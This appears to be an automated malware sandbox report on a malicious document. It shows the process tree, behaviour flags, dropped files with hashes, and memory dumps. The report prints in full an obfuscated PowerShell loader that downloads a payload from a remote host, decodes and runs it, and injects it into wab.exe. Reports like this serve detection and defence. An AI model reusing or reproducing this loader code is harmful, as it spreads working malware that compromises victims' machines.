P,tgbenyl a ioChaubMilia ,kulTraf:.etaSovertAgleeEquir.onfiTrill Ev.iV nesSkria Blat Ap,iFemioKompnKosteI prrSkvenRapieun.r=Strk( ThecDvalmRecedS nt re r/Disccbice arko$K ntUGastnSp.rhbrdmaAeontA,attudsligra nFyldg M.c)Hawf ');Witnesses (Gadsman 'Tewi$,lreg StrlUddaoProfb.vesaNormlSusa:Regnpeje.iArvenSupesUnite BlndDo,basindgPrakeDo.znkonke The=Repr$DeflhSvite Or.rWjcmlHyraePapfsBarn.Cob sAdelpFraflPakfiDisutD,ta(,sob$.ubhRUdvie GnadCal.eUnwhfcaf uSke lAnded eapeSyge) mp ');Witnesses (Gadsman 'Samm[Und NElide PeetAbsc.DegrS ,ineSupprHic,vInosiScrecTempeBrynPL.ksoBr,ei Ri,nRingtUnstM Bibad,cinAtteaSchmgpar,e purrS,ds]Cutt: und:RaadS GldeNondcTribuSt,rrLovoiMarktophuy,ukrPRevorS,idoAadrtAcroo rkc NonoBirtl I.g ,ahm= Tor Ada[UdryNKompe D.ct K.n. ,ouSB aaeBao csensu.aberBla,i DeptTi.iyForbP,uggr HypoDomit GruoFremcFremoLuftl NonT,ingyand,pPreaeKvad]Eh.e:De.p:AfslT t.olmedfsO.ta1Viat2 S.a ');$herles=$pinsedagene[0];$Modtagningers= (Gadsman 'Flaa$,inngBerelkataoS ffbKferaNuvrlFl.v: ariF Re,oFistrValetLatinBanddrg reHeterTyl.= ChiNPseueContwTeks-MegaOUnimbElisjSch eEpiccJordtTryk N.nSEn,ryImprs Be.t SpoeAnnam afs.OverNCelleTyratAlle. V.nWTartePu.ibSt.aCAbiel odeim soeCatrnFiggt');$Modtagningers+=$Sterilisationerne[1];Witnesses ($Modtagningers);Witnesses (Gadsman 'F.ov$AltiFCa,ioSolgrateltCorsnHansdState Tryr.ikr. FlaHB.joe,ortaUn,ddanace FlerEjersThel[ Blo$PeccHCameeSlaglKahyoOutln ,ociA,atnStol]Cerv=Forp$AntiSConsnUdbra Pirk Outs iloSpa.m T,rs TabtReci ');$Breadthriders=Gadsman 'Omh $ Pa Fst lo,ammr gent PolnKnapdUndeeRrlirAlli.AeroDUploo Dr.wRevenGirtlWienoStaraUnindnat,FMar,iPigglTr ce Und(Simu$F ash Or eA.esr epll S,aeDy ksMoot, Dip$Inc HHorreMa alSystlZonehFronoS,alu Nemn Cr dBe,b)Dele ';$Hellhound=$Sterilisationerne[0];Witnesses (Gadsman ' K,m$Spk g Dril Dr o Loub Ubeabldgl str: untSAngluDo.em Unlp Galw BraeFeste .opddisksPoli= M.r(CommTTilsePanasNed,tDist-TilfP ,amaLokkt FlehKru D,if$ P.rHGar,e ncol AtolOplah.lasoTer,uW ncnAcopd den) B.w ');while (!$Sumpweeds) {Witnesses (Gadsman ' Anc$ Loag LenlUnscoProvb Fo,aKim lT,yr:,umpSKal.aEpillTheriHuc,eNivenDilacTrani nfoeSancsGevr=Fjor$ loet SkyrKvaruBa,seStin ') ;Witnesses $Breadthriders;Witnesses (Gadsman ' SchSmultt Unga ilrSe,vtPeri-Til.S ArelMaugeH,rse OutpTred M,rc4Stra ');Witnesses (Gadsman 'Lau $Ka,agOverlRes o Im,bbrn.a Sidltid :ConfS Fisu StimUninp SpawImpeeD,due DecdGorgsstet= .ke(S,ilTTonee larsDreatU,tr-TitaPTo,paprimtI.moh Bet Mewe$BremHStoreNo,rlSolslsmsyhGaroo yneu ClonSq.adR ms) Snv ') ;Witnesses (Gadsman 'Frst$Sab,g en.l FeloMe,lb lbeaVarllJos :BartEC.ikxCompi SkugBorgeSkalnDkmatTelee.roprEkp.= Sn.$SlowgrhablEvaloHorebGadeaSrgelBigw:StatMF ffeD dulHypeaDeromUnpadFejliEftem Esk+Skrm+ nds%Kokk$ OccpSavsiRondnHundsdebae Decd,ncoa G,ngNotaeT.enn ,ooe .fg.Svnic DepoErhouLicenFj.rtRodd ') ;$herles=$pinsedagene[$Exigenter];}$audibility=319597;$Portcullis=28310;Witnesses (Gadsman 'ca.t$Kyllg.denlOv ro KabbR.dba Fesl ede:C.unGT lbaLazyzE teeHjrnbFrusoVeg, Drik=Mo.e UnenG adoeLig,tDds -SapoCBateoBaden AkstEnemeF rfnUnurtVers Fem,$Pa.tHVareePolelUnstlp.rthSal.otil uFemhnImbed.ort ');Witnesses (Gadsman 'Tilt$ jregWhinl ndsokloabP,rta crelGste:Od,vAP,lysArmohS igo nsarHviseSa i Loob=Lecy Sl,p[R,adS.kygyPlatsHackt .nteReekmP.eu.b,nzCPjkkoSpelnFas,vVis.eTilbrCorrtOve ]Bejd:Foto:ForbFFormrSu.mo petmThinBElita G.bsapple Dep6Tinn4U,deS .hrtSjalrMidsiUnden .angirra(Ski,$ryddGco eaHarmzA,steIchtbMy doReas) Or. ');Witnesses (Gadsman 'Forv$Gaspg rial PieoLakfbSpraaTranlStaa:ChemKS.ilaFrugm Autm,nure ForrCuckjRumigProde .umrGreaeStifnC.rcs coc L.mn=Udbu Maxi[AktaSSvinyShors.anetOmase E,em Dem. mi.TFaste .pixDizzt Udv. RegEGemmn Cosc CoroG.srdAtali orfnTra,gPusl]dest:Cory:NeurA,verS Do.CAsepIFyrvI.uny.braiGMysteSpnet SumSDryatToptr DogiRepanBew,g Ta (.org$E imABed sKurshSvipoN,urr,nnoetoft).isa ');Witnesses (Gadsman 'Skum$Postg SphlUnsyo Ridbfoura HerlHarm:S,hiDAm,he NontLabbaOl fcH rahBoreeO remHenceant.n Sm t vie RosrHalv=Hjes$,raiK f na StomCsihmbetae PkgrStorjBaa.gPop emaalrrecoePjatn,innsFami.Impes UgtuErkebFor sbatttG,mbrGenei UntnLidig .os(Bism$SlimaBru uUn nd FariRe,rbStatiAnoel nneiKnostBasiyW.se, ,or$DoriPSi eobecrri,stt.rogcSkruu StjlKryblEkski SwisU,so)Becc ');Witnesses $Detachementer;"
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fastlandsklimaer.Vol && echo t"
4⤵
PID:2132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Azido116 Melamdim Exigenter pinsedagene herles Holderen Reimages trialogue Gazebo Knalde Idealistiske Kammerjgerens Vskens Marbleizer Nonpolarizables populus Ublufrdigheds Wuchereria Cosecants Bullsnake Overstretched Hellhound Blaabrs Tidslerne Azido116 Melamdim Exigenter pinsedagene herles Holderen Reimages trialogue Gazebo Knalde Idealistiske Kammerjgerens Vskens Marbleizer Nonpolarizables populus Ublufrdigheds Wuchereria Cosecants Bullsnake Overstretched Hellhound Blaabrs Tidslerne';If (${host}.CurrentCulture) {$Signetringe++;}Function Gadsman($Unbeliever166){$Faunaerne=$Unbeliever166.Length-$Signetringe;$Nummerordenens='SUBsTR';$Nummerordenens+='ing';For( $Pachouli207=4;$Pachouli207 -lt $Faunaerne;$Pachouli207+=5){$Azido116+=$Unbeliever166.$Nummerordenens.Invoke( $Pachouli207, $Signetringe);}$Azido116;}function Witnesses($Noncontinuable){ .($Anlgstjenesten) ($Noncontinuable);}$Snaksomst=Gadsman 'f,skM SeaoBemozRi,liPe,nlReg l,agga.equ/Obse5 Kro.Koe.0Back Eft( ialWKo pi fl.nCon,d.kisoCommwm,sts.iur No.pN entT ,ie Pur,1Maxi0 ili. Mal0Pect;Rimt ko,oW NgtiStranAabe6Dict4Rest;Kont PerixLama6 Sno4Gaar;,eto Til.rEle.vNrhe:Brid1 Neg2Ford1Vind.Ha v0fors)Men. Ci.cG MaseStracEndeklighoYn.e/Un,a2 Lea0Br,c1 For0 M n0tan,1 jer0A ti1 Alv SchiFHns.iTurnrK ateBli fThiroTolsxAsta/ Tar1tvan2Edic1Ur n.Pant0Pul, ';$Helonin=Gadsman 'For.UClocsTraueBolsrAn.r-Tv,nAUnprg F.yeA ganGigatvikk ';$herles=Gadsman 'trofhMi rtS gmt PhrpBobbsInco: D k/Fore/Be lwGerepintesNyk eCon gUlotuCalar MccoSk.ds His.Ren,cAloeoIdeamkana. Ca.uF,niylust/UnmaPBre rGueraTrehlRacee NeurN phiGenaeModnt JebsBypl.AmphcCau,uDiscrExst ';$Redefulde=Gadsman 'Apac>Flas ';$Anlgstjenesten=Gadsman 'Kaffi.rune.evexUdra ';$Stiftamtmandens='trialogue';$Unhatting = Gadsman 'Ru peAlbucUnplhE.spoInds Subs%DyspaUskopPi,epOperdOpbla ivttRensa.riv%Embr\ S.uFErgoa ArtsFacet Ethl,eraa SavnCan dBruts ,apkI telG,noi Julm BesaKim eU,vir Sa .SilkV kruo BellSta. Bjer&Part&,iet Ko re BetcFormhFortoF,li FiretVaso ';Witnesses (Gadsman '.nsu$ P,tgbenyl a ioChaubMilia ,kulTraf:.etaSovertAgleeEquir.onfiTrill Ev.iV nesSkria Blat Ap,iFemioKompnKosteI prrSkvenRapieun.r=Strk( ThecDvalmRecedS nt re r/Disccbice arko$K ntUGastnSp.rhbrdmaAeontA,attudsligra nFyldg M.c)Hawf ');Witnesses (Gadsman 'Tewi$,lreg StrlUddaoProfb.vesaNormlSusa:Regnpeje.iArvenSupesUnite BlndDo,basindgPrakeDo.znkonke The=Repr$DeflhSvite Or.rWjcmlHyraePapfsBarn.Cob sAdelpFraflPakfiDisutD,ta(,sob$.ubhRUdvie GnadCal.eUnwhfcaf uSke lAnded eapeSyge) mp ');Witnesses (Gadsman 'Samm[Und NElide PeetAbsc.DegrS ,ineSupprHic,vInosiScrecTempeBrynPL.ksoBr,ei Ri,nRingtUnstM Bibad,cinAtteaSchmgpar,e purrS,ds]Cutt: und:RaadS GldeNondcTribuSt,rrLovoiMarktophuy,ukrPRevorS,idoAadrtAcroo rkc NonoBirtl I.g ,ahm= Tor Ada[UdryNKompe D.ct K.n. ,ouSB aaeBao csensu.aberBla,i DeptTi.iyForbP,uggr HypoDomit GruoFremcFremoLuftl NonT,ingyand,pPreaeKvad]Eh.e:De.p:AfslT t.olmedfsO.ta1Viat2 S.a ');$herles=$pinsedagene[0];$Modtagningers= (Gadsman 'Flaa$,inngBerelkataoS ffbKferaNuvrlFl.v: ariF Re,oFistrValetLatinBanddrg reHeterTyl.= ChiNPseueContwTeks-MegaOUnimbElisjSch eEpiccJordtTryk N.nSEn,ryImprs Be.t SpoeAnnam afs.OverNCelleTyratAlle. V.nWTartePu.ibSt.aCAbiel odeim soeCatrnFiggt');$Modtagningers+=$Sterilisationerne[1];Witnesses ($Modtagningers);Witnesses (Gadsman 'F.ov$AltiFCa,ioSolgrateltCorsnHansdState Tryr.ikr. FlaHB.joe,ortaUn,ddanace FlerEjersThel[ Blo$PeccHCameeSlaglKahyoOutln ,ociA,atnStol]Cerv=Forp$AntiSConsnUdbra Pirk Outs iloSpa.m T,rs TabtReci ');$Breadthriders=Gadsman 'Omh $ Pa Fst lo,ammr gent PolnKnapdUndeeRrlirAlli.AeroDUploo Dr.wRevenGirtlWienoStaraUnindnat,FMar,iPigglTr ce Und(Simu$F ash Or eA.esr epll S,aeDy ksMoot, Dip$Inc HHorreMa alSystlZonehFronoS,alu Nemn Cr dBe,b)Dele ';$Hellhound=$Sterilisationerne[0];Witnesses (Gadsman ' K,m$Spk g Dril Dr o Loub Ubeabldgl str: untSAngluDo.em Unlp Galw BraeFeste .opddisksPoli= M.r(CommTTilsePanasNed,tDist-TilfP ,amaLokkt FlehKru D,if$ P.rHGar,e ncol AtolOplah.lasoTer,uW ncnAcopd den) B.w ');while (!$Sumpweeds) {Witnesses (Gadsman ' Anc$ Loag LenlUnscoProvb Fo,aKim lT,yr:,umpSKal.aEpillTheriHuc,eNivenDilacTrani nfoeSancsGevr=Fjor$ loet SkyrKvaruBa,seStin ') ;Witnesses $Breadthriders;Witnesses (Gadsman ' SchSmultt Unga ilrSe,vtPeri-Til.S ArelMaugeH,rse OutpTred M,rc4Stra ');Witnesses (Gadsman 'Lau $Ka,agOverlRes o Im,bbrn.a Sidltid :ConfS Fisu StimUninp SpawImpeeD,due DecdGorgsstet= .ke(S,ilTTonee larsDreatU,tr-TitaPTo,paprimtI.moh Bet Mewe$BremHStoreNo,rlSolslsmsyhGaroo yneu ClonSq.adR ms) Snv ') ;Witnesses (Gadsman 'Frst$Sab,g en.l FeloMe,lb lbeaVarllJos :BartEC.ikxCompi SkugBorgeSkalnDkmatTelee.roprEkp.= Sn.$SlowgrhablEvaloHorebGadeaSrgelBigw:StatMF ffeD dulHypeaDeromUnpadFejliEftem Esk+Skrm+ nds%Kokk$ OccpSavsiRondnHundsdebae Decd,ncoa G,ngNotaeT.enn ,ooe .fg.Svnic DepoErhouLicenFj.rtRodd ') ;$herles=$pinsedagene[$Exigenter];}$audibility=319597;$Portcullis=28310;Witnesses (Gadsman 'ca.t$Kyllg.denlOv ro KabbR.dba Fesl ede:C.unGT lbaLazyzE teeHjrnbFrusoVeg, Drik=Mo.e UnenG adoeLig,tDds -SapoCBateoBaden AkstEnemeF rfnUnurtVers Fem,$Pa.tHVareePolelUnstlp.rthSal.otil uFemhnImbed.ort ');Witnesses (Gadsman 'Tilt$ jregWhinl ndsokloabP,rta crelGste:Od,vAP,lysArmohS igo nsarHviseSa i Loob=Lecy Sl,p[R,adS.kygyPlatsHackt .nteReekmP.eu.b,nzCPjkkoSpelnFas,vVis.eTilbrCorrtOve ]Bejd:Foto:ForbFFormrSu.mo petmThinBElita G.bsapple Dep6Tinn4U,deS .hrtSjalrMidsiUnden .angirra(Ski,$ryddGco eaHarmzA,steIchtbMy doReas) Or. ');Witnesses (Gadsman 'Forv$Gaspg rial PieoLakfbSpraaTranlStaa:ChemKS.ilaFrugm Autm,nure ForrCuckjRumigProde .umrGreaeStifnC.rcs coc L.mn=Udbu Maxi[AktaSSvinyShors.anetOmase E,em Dem. mi.TFaste .pixDizzt Udv. RegEGemmn Cosc CoroG.srdAtali orfnTra,gPusl]dest:Cory:NeurA,verS Do.CAsepIFyrvI.uny.braiGMysteSpnet SumSDryatToptr DogiRepanBew,g Ta (.org$E imABed sKurshSvipoN,urr,nnoetoft).isa ');Witnesses (Gadsman 'Skum$Postg SphlUnsyo Ridbfoura HerlHarm:S,hiDAm,he NontLabbaOl fcH rahBoreeO remHenceant.n Sm t vie RosrHalv=Hjes$,raiK f na StomCsihmbetae PkgrStorjBaa.gPop emaalrrecoePjatn,innsFami.Impes UgtuErkebFor sbatttG,mbrGenei UntnLidig .os(Bism$SlimaBru uUn nd FariRe,rbStatiAnoel nneiKnostBasiyW.se, ,or$DoriPSi eobecrri,stt.rogcSkruu StjlKryblEkski SwisU,so)Becc ');Witnesses $Detachementer;"
4⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fastlandsklimaer.Vol && echo t"
5⤵
PID:2228

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2884

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize
1KB

MD5
2365869258df7a66a2121b802ca4afd9

SHA1
73acc30a2edeb9d6830de559bb8a74f35168135d

SHA256
d6b1932822bbd72a8e78c771717d992142348f67d625a42393719fefbe59b0ed

SHA512
795004bab536e128dbd81c188976d37c7b650efbfa5a80374df4c65a1049c27658f4620b7605583928eb167fcb69b4c99e4c8730c507b824a7bde9c7fb0e21f4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8
Filesize
436B

MD5
1bfe0a81db078ea084ff82fe545176fe

SHA1
50b116f578bd272922fa8eae94f7b02fd3b88384

SHA256
5ba8817f13eee00e75158bad93076ab474a068c6b52686579e0f728fda68499f

SHA512
37c582f3f09f8d80529608c09041295d1644bcc9de6fb8c4669b05339b0dd870f9525abc5eed53ad06a94b51441275504bc943c336c5beb63b53460ba836ca8d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize
174B

MD5
8f214613ecaf71b4bd55b3643dae70c7

SHA1
ce0bc71927ba3c8c430211720bab483b09489685

SHA256
977e46bd22bb6a10a5a95db3c7290667d01689e5b59e77e47d9808053c06bae5

SHA512
81a828d1893390905a0f864382b725e2aafd7a8ddce74c17ba5ccc0efb3bfca41bce440bb96b64ce3586529f92bd18a021e0732a4746958bb565a2eaec079e57

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
342B

MD5
be870aa99d02bf5bf748641f2d820f05

SHA1
72e3f8a3187ab2939c5bcfa069f200c5478dc9bc

SHA256
f03214012915c1ef2febb0c0bb5c4c9dcdaa9a5dfc57b5deb7e226da915e9509

SHA512
4b15eb649f2c6cc65391503c014d3d2105c22130646fd722be4c7df5206bdc64cb87c209725db7ecf29c55884cc5a2e20ba931abc911cbe5a682385441b9ba39

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
72253f4d1d6c8d4a810c9e3dc18dedf0

SHA1
f7d4a3d32ea0a469e54ecc5b5ce783f1684d3105

SHA256
c3a1ec41e06e61092a757fcefbe1ba41b0816bada974f34ccfcb63e7e561f36a

SHA512
35573b5fb4f9ad6728ec6750f386c0e2a7fda1e47124a861310d49b9f76c3320f85a0dd04741b623a076258fa66edcea0dfb6fba9e5827bfff3135767ee3a858

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize
170B

MD5
435f2239a4272c55181cf8080bc43c10

SHA1
71c7e4d412462e92a8d0e2a0179f80bb65a0bc7b

SHA256
4e078450aa6613fceeb9c40f3216224a673855470db3511e3199a8af43f45858

SHA512
d1b6e85b46f7c3ec04459b1125d736bf9a922bd976ae0fd4d475380dc6fbdb537b399cd21d99e03f9d4dd50acb8a0c12e7f4be361384e614c29b5c7bea9bc2bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{3B22DAF9-60CB-472E-B1C4-B53BB75A4E0D}.FSD
Filesize
128KB

MD5
a663b02552a33477f9dbf77218b7d58d

SHA1
e31b1e3f568ebbe52a2929bd03aa1e8af6256bac

SHA256
8d49922d4ec809b8481eb76217bb67020c17a3ea6137a1f5bd1028fbbae4a004

SHA512
f487eb5e847413de27f05e6a6e128b7d684ab6370a179fd1c8c56ad5315ef253635ef58e1b98e6e85ff06518516f3559557c7eb03f6a2a8ca3970c20737f36fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
d19dc747719ddcfabe9b6d19984881b9

SHA1
a640a6eba95cdeb70f1b107d120a16251edd8f84

SHA256
daaf2146df25f975f7a864a340777ddf79ad9590e5a6d2d7df01d8fde46b03a9

SHA512
8ec7354a8f210c8775cc12bd2548542c117b8a7090cb7039df2719182dc1f96e0b77e8bf4b7be6e99d95de8b73bb63800dcaafbaca4e9f978b83c01cc6d3a41e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\datti[1].doc
Filesize
525KB

MD5
7f564621be35915fd063b91684edfe8f

SHA1
164fa8ba0b77af03415bb18465866a03fbc5506c

SHA256
b4e873d04126d8de007f7b91a394334b6b4c859815529ef90e517bb1b219094e

SHA512
101f5dd43a436a4af731b2142716e5e0644b17fea56297c5f9e3c097c1ae172b42c774d66126216a77cdf7d53a77d46f80cc9a00d556c9f17d8c325a9c59f93e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2472.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2666.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\{EFB6C1A7-F756-4B5E-BD66-8C8AB2C3FAFC}
Filesize
128KB

MD5
aec8eaf020d7019b2618218e674badca

SHA1
db8666c8fd120e0b309b0f293dca955cc735205e

SHA256
6ff488c8ccc81505fa0c0f9765f84080664826a5f0a919e0e8e99f4764c6c819

SHA512
d87bfd44740e14b5cb138914d3c87eb502c210a323f054be063b991a98b4819477a779e931aff9de2bc16ae767ae012512507d17a8614b839c08d4940d50e985

Download Submit
C:\Users\Admin\AppData\Roaming\Fastlandsklimaer.Vol
Filesize
453KB

MD5
bee0d14302fba302426002cecb27e7bc

SHA1
d0cbe82acee1b47a07bf34642699102467f450b4

SHA256
4485811b7d2c63745838b7ebe8a25f8a872432e2f92fa1897999605dd46f3ac8

SHA512
be5d110f57e5999905771cc0aa5520ada09eaa2150c9b9fd5f9d1f27208a1198810f737c9e6bcac0eb6d6e4ed832f9896ded1802a6cd0a07189b66371ee6e94c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
38e80bf56e10a28feeb6650d82d3befc

SHA1
1bb85125cf6268bac0035dcd5e8a57a97cae4820

SHA256
4720b3a4e405872b52f93b0ede24bcc5c9a37c786c61cf1e125b8e2125b15747

SHA512
850bbad5abf0e738bdb5756415fec3f727ed7d68bf4fef08dadc1419c859fbade7a74d8a1597fa915709b7d065f89bed94976a83ca47658c3f0efbb156b1c4b5

Download Submit
C:\Users\Admin\AppData\Roaming\datti38291.vbs
Filesize
412KB

MD5
d14d60f8f5e7811d5723661101abb2bc

SHA1
03dc6bba516d3f65b478edf9655ad90fbaf37acb

SHA256
ce94e5a3cf3b8faa5e5b5c610c0ad8164ab905925c2ee86b3e9045401f42b696

SHA512
0562e7fd5cbdcf06a9fee4f748b6a75971ccd807ec54fd3e5a6341e830e1853eb89e866e766b51df889d2504d6a0ee827d1a89596dd49e1eefb6a115bfa06e80

Download Submit
memory/1276-163-0x0000000006700000-0x0000000008850000-memory.dmp

Filesize
33.3MB

Download
memory/2360-155-0x00000000711DD000-0x00000000711E8000-memory.dmp

Filesize
44KB

Download
memory/2360-0-0x000000002FCB1000-0x000000002FCB2000-memory.dmp

Filesize
4KB

Download
memory/2360-2-0x00000000711DD000-0x00000000711E8000-memory.dmp

Filesize
44KB

Download
memory/2360-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2800-189-0x00000000007F0000-0x0000000000812000-memory.dmp

Filesize
136KB

Download
memory/2800-191-0x0000000000070000-0x000000000009F000-memory.dmp

Filesize
188KB

Download
memory/2884-166-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/2884-187-0x00000000007A0000-0x00000000028F0000-memory.dmp

Filesize
33.3MB

Download
memory/2884-188-0x00000000007A0000-0x00000000028F0000-memory.dmp

Filesize
33.3MB

Download